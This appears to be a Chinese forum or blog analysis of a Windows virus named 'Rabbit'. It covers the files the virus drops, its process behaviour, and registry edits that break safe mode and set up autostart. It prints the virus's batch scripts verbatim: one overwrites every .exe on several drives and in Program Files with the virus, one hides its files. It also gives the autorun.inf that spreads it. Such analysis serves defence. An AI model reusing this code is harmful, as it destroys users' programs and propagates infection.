病毒是个兔子的图标 还挺好看的蛤
不过这是个行为极其恶劣的病毒
1.破坏安全模式
2.导致系统无法关机 重启 注销
3.直接替换exe文件
4.导致冰刃 sreng SSM等安全工具无法运行
目前所有杀毒软件都还无法查杀
运行文件后：
释放如下文件
C:\WINDOWS\system32\JK.exe
C:\WINDOWS\system32\love.bat
C:\WINDOWS\system32\loveRabbit.bat
C:\WINDOWS\system32\loveRabbit.exe
C:\WINDOWS\system32\msexch400.dll
C:\WINDOWS\system32\Rabbit.exe
C:\WINDOWS\msconfig.inf
C:\WINDOWS\msconfig1.inf
在进程里有两个 互相监视 不断调用cmd.exe （用以执行C:\WINDOWS\system32\love.bat和C:\WINDOWS\system32\loveRabbit.bat的内容）和attrib.exe

C:\WINDOWS\system32\loveRabbit.bat内容如下
attrib +s +h C:\WINDOWS\system32\msexch400.dll
attrib +s +h d:\Rabbit.exe
attrib +s +h e:\Rabbit.exe
attrib +s +h c:\Rabbit.exe
attrib +s +h f:\Rabbit.exe
attrib +s +h g:\Rabbit.exe
attrib +s +h h:\Rabbit.exe
attrib +s +h e:\AutoRun.inf
attrib +s +h f:\AutoRun.inf
attrib +s +h c:\AutoRun.inf
attrib +s +h d:\AutoRun.inf
attrib +s +h h:\AutoRun.inf
attrib +s +h g:\AutoRun.inf
不断为这些文件加上系统和隐藏属性

C:\WINDOWS\system32\love.bat内容如下
FOR %%a in ( d: e: f: h: g: ) do dir /s/b %%a\*.exe>>c:\windows\msconfig.inf
cd C:\Program Files
dir *.exe /s /b >>c:\windows\msconfig1.inf
FOR /f "delims=" %%i in (c:\windows\msconfig.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i"
FOR /f "delims=" %%i in (c:\windows\msconfig1.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i"

把d: e: f: g: h:的所有exe文件做一个列表放到c:\windows\msconfig.inf
把C:\Program Files所有exe 做一个列表 放到c:\windows\msconfig1.inf
然后分别用C:\WINDOWS\system32\Rabbit.exe 替换这些exe（正在运行的不替换）


每个分区下面释放一个Rabbit.exe和一个autorun.inf
autorun.inf 内容
[autorun]
Label=本地磁盘
Shellexecute=Rabbit.exe
达到双击运行之目的
右键增加 “自动播放”

注册表方面:
增加HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{4bf41072-b2b1-21c1-b5c1-0305f4155515}\StubPath
指向C:\WINDOWS\system32\JK.exe （这项应该导致他的开机启动，本人水平有限，不懂这项注册表，望大家指教）

删除键HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
删除值
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}\: "DiskDrive"
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\: "DiskDrive"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}\: "DiskDrive"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\: "DiskDrive"
达到破坏安全模式的目的

还有一点是最厉害的，他生成的msexch400.dll插入系统的winlogon 进程，使得winlogon.exe的线程数会不断上升，干扰正常的关机和注销，并在loveRabbit.exe被结束时由winlogon.exe重新启动，注销或者关机；


另外此病毒会破坏冰刃 sreng 的运行（即便将他们改名，我测试时候就是改成了fdfdsfds.bat,可照样被结束，不知道原理还..)

测试病毒时候 SSM也没有任何反映 机器直接卡死


另外 病毒体内留下文字：
I LOVE Rabbit ,and you ? look:http://z8232****.diy.myrice.com/Rabbit.htm (摘自艾玛博客里的分析，感谢)
此病毒行为比较恶劣 不过我想应该是个病毒的雏形或是恶意文件 还没有公开
不过如果被黑客利用来网上挂马或者制作大量变种 后果将不堪设想
因为病毒是替换的文件 而不是感染文件 所以杀毒软件连修复的机会都没有...

作者百度空间: http://hi.baidu.com/bsgzz

由于本人对于批处理 某些注册表项目不甚了解 所以
分析过程中 轩辕小聪 懒人小G 六翼刺猬 艾玛 正奇等对本人做了指点 在此表示感谢！

附 感染系统后的截图